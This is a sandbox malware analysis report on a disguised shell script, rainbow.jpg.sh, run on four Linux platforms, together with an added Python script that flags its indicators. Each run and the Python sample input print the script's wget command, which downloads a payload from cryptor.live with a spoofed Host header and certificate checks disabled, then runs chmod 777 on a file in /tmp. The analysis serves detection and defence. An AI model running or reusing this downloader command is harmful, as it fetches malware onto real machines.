Analysis Overview
SHA256
890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa
Threat Level: Shows suspicious behavior
The file rainbow.jpg.sh (a shell script whose double extension, .jpg.sh, makes it read as an image in a listing) was assessed as showing suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15: File and Directory Permissions Modification (T1222)
Analysis: static1
Detonation Overview
Reported
2024-11-13 06:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
0s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.cwW5Sdp2dc | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.cwW5Sdp2dc | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.cwW5Sdp2dc https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
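All four runs execute the same sequence: dirname on the script's own path, mktemp, a wget fetch from cryptor.live whose Host header names cryptor.biz, with certificate checking disabled and unlimited retries, and finally chmod 777 on /tmp/2.jpg. Note that /tmp/2.jpg is not the mktemp path the download is written to; the report records no rename or move and its Files section is empty, so how the download reaches that name is not visible here. The following added example, which is not part of this report or of any vendor tooling, parses command lines of this shape and flags each of those indicators. The sample input is a constructed copy of the behavioral1 process list; the extension sets and staging directories are assumptions.

```python
"""Heuristic triage of the process command lines a sandbox report lists.

Added example (not part of the sandbox report or its tooling): it parses
each command line and flags the indicators a reviewer would pick out by
hand. The sample input is a constructed copy of the behavioral1 process
list; the extension sets and staging directories are assumptions.
"""
import re
import shlex
from urllib.parse import urlparse

# Constructed sample input: argv strings as the report prints them.
SAMPLE_PROCESSES = [
    "/tmp/rainbow.jpg.sh",
    "dirname -- /tmp/rainbow.jpg.sh",
    "mktemp",
    ("wget -O /tmp/tmp.cwW5Sdp2dc "
     "https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti "
     "--header Host: cryptor.biz --no-check-certificate --retry-connrefused "
     "--waitretry=1 --read-timeout=20 --timeout=15 -t 0"),
    "chmod 777 /tmp/2.jpg",
]

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")         # assumed staging dirs
DATA_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}  # assumed "harmless" extensions
EXEC_EXT = {"sh", "bash", "py", "pl", "elf", "bin"}     # assumed executable extensions


def basename(path):
    return path.rsplit("/", 1)[-1]


def has_double_extension(path):
    """True for names like rainbow.jpg.sh: a data extension in front of an executable one."""
    parts = basename(path).lower().split(".")
    return len(parts) >= 3 and parts[-2] in DATA_EXT and parts[-1] in EXEC_EXT


def analyze_wget(cmd):
    """Pull the fields that matter out of a wget command line, or None if not wget."""
    argv = shlex.split(cmd)
    if not argv or basename(argv[0]) != "wget":
        return None
    url = next((a for a in argv if a.startswith(("http://", "https://"))), None)
    url_host = urlparse(url).hostname if url else None
    # The report prints the header argument split into two tokens ("Host:" and
    # the value); a regex over the raw string handles that and a quoted form.
    m = re.search(r"--header[= ]+[\"']?Host:\s*([^\s\"']+)", cmd)
    header_host = m.group(1) if m else None
    out, tries = None, None
    for i, a in enumerate(argv):
        if a == "-O" and i + 1 < len(argv):
            out = argv[i + 1]
        elif a.startswith("--output-document="):
            out = a.split("=", 1)[1]
        elif a == "-t" and i + 1 < len(argv):
            tries = argv[i + 1]
        elif a.startswith("--tries="):
            tries = a.split("=", 1)[1]
    return {
        "url_host": url_host,
        "header_host": header_host,
        # Host header naming a different site than the URL: the TLS connection
        # goes to url_host while the HTTP request asks the server for header_host.
        "host_mismatch": bool(url_host and header_host and url_host != header_host),
        "no_cert_check": "--no-check-certificate" in argv,
        "infinite_retries": tries == "0",
        "output_path": out,
        "writes_tmp": bool(out and out.startswith(TMP_DIRS)),
    }


def analyze_chmod(cmd):
    """Return mode and any staging-dir targets of a chmod command line, or None if not chmod."""
    argv = shlex.split(cmd)
    if not argv or basename(argv[0]) != "chmod":
        return None
    mode = argv[1] if len(argv) > 1 else ""
    world_writable = bool(
        (re.fullmatch(r"[0-7]{3,4}", mode) and int(mode[-1], 8) & 0o2)
        or re.search(r"\b(a|o|ugo)[+=][rxst]*w", mode)
    )
    return {"mode": mode,
            "world_writable": world_writable,
            "tmp_targets": [t for t in argv[2:] if t.startswith(TMP_DIRS)]}


def triage(processes):
    """Return one finding string per indicator seen across the process list."""
    findings = []
    for cmd in processes:
        argv = shlex.split(cmd)
        if argv and has_double_extension(argv[0]):
            findings.append(f"double-extension script executed: {argv[0]}")
        w = analyze_wget(cmd)
        if w:
            if w["host_mismatch"]:
                findings.append(f"wget Host header {w['header_host']} differs from URL host {w['url_host']}")
            if w["no_cert_check"]:
                findings.append("wget --no-check-certificate (TLS validation disabled)")
            if w["infinite_retries"]:
                findings.append("wget -t 0 (retry forever)")
            if w["writes_tmp"]:
                findings.append(f"wget writes payload to {w['output_path']}")
        c = analyze_chmod(cmd)
        if c and c["world_writable"] and c["tmp_targets"]:
            findings.append(f"chmod {c['mode']} on {' '.join(c['tmp_targets'])}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCESSES):
        print("-", finding)
```

Run against the constructed list it reports six findings: the double-extension script, the Host/URL host mismatch, the disabled certificate check, the unlimited retries, the write into /tmp, and the world-writable chmod in /tmp. The Host mismatch is the one worth keying on for network detection, since DNS and TLS only ever show cryptor.live while the request itself is for cryptor.biz.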
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 1.1.1.1:53 | cryptor.live | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| GB | 185.125.188.62:443 | N/A | tcp |
| GB | 185.125.188.62:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| US | 151.101.1.91:443 | N/A | tcp |
| GB | 195.181.164.15:443 | N/A | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-armhf-20240729-en
Max time kernel
1s
Max time network
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.WZ6zjdRO1H | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.WZ6zjdRO1H | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.WZ6zjdRO1H https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-mipsbe-20240418-en
Max time kernel
1s
Max time network
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.j1h9hwjaTf | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.j1h9hwjaTf | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.j1h9hwjaTf https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 172.67.190.23:443 | cryptor.live | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-13 06:12
Reported
2024-11-13 06:14
Platform
debian9-mipsel-20240418-en
Max time kernel
1s
Max time network
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tmp.jf2YkswMoM | /bin/mktemp | N/A |
| File opened for modification | /tmp/tmp.jf2YkswMoM | /usr/bin/wget | N/A |
Processes
/tmp/rainbow.jpg.sh
[/tmp/rainbow.jpg.sh]
/usr/bin/dirname
[dirname -- /tmp/rainbow.jpg.sh]
/bin/mktemp
[mktemp]
/usr/bin/wget
[wget -O /tmp/tmp.jf2YkswMoM https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]
/bin/chmod
[chmod 777 /tmp/2.jpg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | cryptor.live | udp |
| US | 104.21.65.117:443 | cryptor.live | tcp |